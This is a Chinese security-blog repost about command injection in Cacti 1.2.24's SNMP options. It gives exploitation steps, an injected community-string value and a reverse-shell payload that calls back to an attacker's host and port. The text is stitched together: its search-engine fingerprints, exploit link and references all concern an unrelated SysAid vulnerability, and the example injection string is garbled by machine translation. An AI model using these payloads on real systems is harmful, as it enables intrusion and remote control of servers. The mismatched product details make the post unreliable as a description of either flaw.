漏洞描述
在 Cacti 1.2.24 中,在某些条件下,经过身份验证的特权用户可以在设备的 SNMP 选项中使用恶意字符串,执行命令注入并在底层服务器上获取远程代码执行。
FOFA语句
fofa:body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href="http://www.sysaid.com">by SysAid</a>"
shodan:http.favicon.hash:1540720428
zoomeye:app:"SysAid On-Prem Software"
hunter.how:favicon_hash="5f30870725d650d7377a134c74f41cfd"
利用条件
-
攻击者已通过身份验证(有账号密码或认证后的会话)。
-
攻击者的权限允许管理设备和/图形,例如“站点/设备/数据”、“图形”。
-
可以使用支持SNMP 的设备。
-
可以使用 Net-SNMP 图表。
-
PHP 的 snmp 模块未安装。
漏洞利用示例
-
前往“控制台”>“创建”>“新设备”。
-
创建支持 SNMP 版本 1 或 2 的设备。
-
确保设备具有包含以下一个或多个模板的图表:
-
“Net-SNMP – 组合 SCSI 磁盘字节”
-
“Net-SNMP – 组合 SCSI 磁盘 I/O”
-(从模板“Net-SNMP Device”创建设备将满足图形先决条件) -
在“SNMP 选项”中,对于“SNMP 社区字符串”字段,使用如下值:
民众’ ; 触摸 /tmp/m3ssap0 ;’ -
单击“创建”按钮。
-
检查 /tmp 下是否存在已创建的文件。
要获得反向 shell,可以使用如下所示的payload。
public' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; '
类似的漏洞可用于编辑现有的具有相同的先决条件、并等待轮询器运行的设备。可能需要使用不涉及 SNMP 的项目更改“可用性/可达性选项”部分下的“停机设备检测”字段的内容(因为恶意负载可能会中断与主机的交互)。
EXP代码
见 https://github.com/W01fh4cker/CVE-2023-47246-EXP
参考链接
https://md5ol.com/211/
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability
https://github.com/W01fh4cker/CVE-2023-47246-EXP
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
原文始发于微信公众号(巢安实验室):Cacti 命令注入漏洞及利用方式
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论